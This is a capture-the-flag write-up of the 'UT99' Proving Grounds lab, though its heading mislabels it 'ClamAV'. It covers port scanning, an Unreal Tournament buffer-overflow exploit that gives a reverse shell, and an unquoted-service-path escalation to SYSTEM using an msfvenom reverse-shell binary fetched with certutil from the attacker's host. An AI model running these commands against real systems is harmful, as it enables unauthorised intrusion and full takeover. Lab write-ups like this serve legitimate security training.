UT99

Proving Grounds PG Practice ClamAV writeup

Nmap

sudo nmap 192.168.142.44 -p- -sS -sV                               

PORT     STATE SERVICE      VERSION
21/tcp   open  ftp          FileZilla ftpd
80/tcp   open  http         Apache httpd 2.4.16 (OpenSSL/1.0.1p PHP/5.6.12)
443/tcp  open  ssl/http     Apache httpd 2.4.16 (OpenSSL/1.0.1p PHP/5.6.12)
3306/tcp open  mysql        MySQL (unauthorized)
6660/tcp open  irc          InspIRCd
-
-
7000/tcp open  irc          InspIRCd
6673/tcp open  vision_elmd?
7001/tcp open  tcpwrapped
7005/tcp open  tcpwrapped
7007/tcp open  irc          InspIRCd
Service Info: Hosts: localhost, www.example.com, irc.madcowz.localdomain; 
OS: Windows; CPE: cpe:/o:microsoft:window

Whilst FTP open I was unable to connect successfully without valid credentials as shown below:

Trying the web server we see we are taken to the MadCowz website.

Running whatweb against the web server shows it is running Apache 2.4.16 on a 32-bit Windows host.

From here nothing else too interesting was found on the web sever by means of exploitation. MySQL login was also denied to my attacking machine.

However, we do have IRC open on a large range of ports 6660-7000,7007. Connecting to these ports with command line options was proving unreliable due to frequent disconnections. Installing HexChat proved much more successful.

sudo apt-get install hexchat

With HexChat open add a network and use the settings as per shown below. Ensuring the correct IP is set.

After doing so close the window and then connect to the new network. You should see a similar screen as below:

From here go to Server --> Channel List --> Perform a wildcard * search on the defaultsettings to find the channel #ut99.

This channel identifies the server is intended for Unreal Tournament 99 which we know is also running on Windows due to previous enumeration. Joining the channel also reveals the user Daisy.

Searching for Unreal Tournament 99 exploits for Windows on exploit-db shows the following:

Unreal Tournament - Remote Buffer Overflow (SEH)Exploit Database

After downloading the exploit code and looking through it we see the following usage example:

unreal_tournament-bof-win.pl <host> <query port> <reverse ip> <reverse port>

We know from the HexChat and Nmap enumeration that the server for UT99 is running on port 7778. I set up a netcat listener on my attacking machine to port 80. I then used the following command to connect to the target server.

perl ut99.pl 192.168.142.44 7778 192.168.49.142 80

Resulting in a reverse shell.

From here with standard enumeration we find the directory C:\ftp containing the following contents.

 Directory of c:\ftp

10/07/2015  06:21 AM    <DIR>          .
10/07/2015  06:21 AM    <DIR>          ..
10/07/2015  01:44 PM        35,984,520 FoxitReader706.1126_enu_Setup.exe
10/07/2015  04:46 AM        35,922,892 KB968930.msu
10/07/2015  01:45 PM       114,238,280 xampp-win32-5.6.12-0-VC11-installer.exe

The version of Foxit Reader shown 7.0.6.1126 appears to be vulnerable to an unquoted service path privilege escalation.

Foxit Reader 7.0.6.1126 - Unquoted Service Path Privilege EscalationExploit Database

Exploit Link

Checking installed software on the target system we can see Foxit Reader is installed.

 Directory of c:\Program Files (x86)

10/07/2015  04:04 AM    <DIR>          .
10/07/2015  04:04 AM    <DIR>          ..
11/02/2006  06:33 AM    <DIR>          Common Files
10/07/2015  04:04 AM    <DIR>          Foxit Software
10/03/2015  02:34 AM    <DIR>          InspIRCd
04/11/2009  09:30 AM    <DIR>          Internet Explorer
11/02/2006  08:05 AM    <DIR>          MSBuild
09/30/2015  11:12 PM    <DIR>          Mumble
11/02/2006  08:05 AM    <DIR>          Reference Assemblies
04/11/2009  09:30 AM    <DIR>          Windows Calendar
01/20/2008  08:09 PM    <DIR>          Windows Collaboration
01/20/2008  08:08 PM    <DIR>          Windows Defender
04/11/2009  09:30 AM    <DIR>          Windows Mail
04/11/2009  09:30 AM    <DIR>          Windows Media Player
11/02/2006  08:05 AM    <DIR>          Windows NT
04/11/2009  09:30 AM    <DIR>          Windows Photo Gallery
04/11/2009  09:30 AM    <DIR>          Windows Sidebar
               0 File(s)              0 bytes
              17 Dir(s)  13,051,826,176 bytes free

Querying the service on the target systems shows the service is running in the context of SYSTEM and the binary path indeed contains spaces and is not wrapped in quotes.

cmd:>sc qc FoxitCloudUpdateService

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: FoxitCloudUpdateService
TYPE               : 110  WIN32_OWN_PROCESS (interactive)
START_TYPE         : 2   AUTO_START
ERROR_CONTROL      : 1   NORMAL
BINARY_PATH_NAME   : C:\Program Files (x86)\Foxit Software\Foxit Reader\Foxit Cloud\FCUpdateService.exe
LOAD_ORDER_GROUP   : 
TAG                : 0
DISPLAY_NAME       : Foxit Cloud Safe Update Service
DEPENDENCIES       : 
SERVICE_START_NAME : LocalSystem

I then tested for write privileges in the binary path by creating a text file in the C:\Program Files (x86)\Foxit Software\Foxit Reader\ path.

echo Hello > test.txt

Checking the contents of the directory after doing so we see the test.txt file.

 Directory of c:\Program Files (x86)\Foxit Software\Foxit Reader

08/25/2021  12:35 PM    <DIR>          .
08/25/2021  12:35 PM    <DIR>          ..
11/26/2014  06:03 PM           385,248 64BitMailAgent.exe
10/07/2015  04:04 AM    <DIR>          Advertisement
10/07/2015  04:04 AM    <DIR>          docusign
10/07/2015  04:05 AM    <DIR>          Foxit Cloud
08/25/2021  12:32 PM             7,168 Foxit.exe
11/27/2014  10:24 AM        42,164,448 FoxitReader.exe
11/27/2014  03:49 PM            74,588 FoxitReader.exe.man
11/26/2014  06:03 PM         4,856,544 FoxitUpdater.exe
11/26/2014  07:15 PM         1,621,728 FXCUSTOM.dll
10/07/2015  04:04 AM    <DIR>          lex
08/28/2014  10:25 AM            27,076 notice.txt
10/07/2015  04:04 AM    <DIR>          plugins
10/07/2015  04:04 AM    <DIR>          Release Note
11/26/2014  06:03 PM         2,093,280 SendCrashReport.exe
10/07/2015  04:04 AM    <DIR>          Shell Extensions
10/07/2015  04:04 AM    <DIR>          Skins
10/07/2015  04:04 AM    <DIR>          stamps
10/07/2015  04:04 AM    <DIR>          Start
08/25/2021  12:35 PM                 8 test.txt '# Test file created'
11/26/2014  07:07 PM         2,302,176 TrackReview.exe
10/07/2015  04:05 AM           278,490 unins000.dat
10/07/2015  04:02 AM         1,479,392 unins000.exe
10/07/2015  04:05 AM            22,701 unins000.msg
11/18/2014  04:38 PM         2,004,704 UninstallPrint.exe
10/07/2015  04:05 AM             1,270 UpdaterInfo.xml
              15 File(s)     57,318,821 bytes
              12 Dir(s)  13,053,591,552 bytes free

I then performed a test reboot of the machine and confirmed that as the user Daisy I was able to reboot the machine. Currently this looks like we have a path to privilege escalation.

Firstly using msfvenom I created a stageless reverse shell.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.142 LPORT=80 -f exe -o Foxit.exe

I then uploaded this to the directory C:\Program Files (x86)\Foxit Software\Foxit Reader\

certutil.exe -f -urlcache -split http://<IP>/Foxit.exe

After the upload was completed I started a netcat listener on my attacking machine then rebooted the target system.

shutdown.exe -r -f -t 1

Shortly after I was able to obtain privileges as SYSTEM.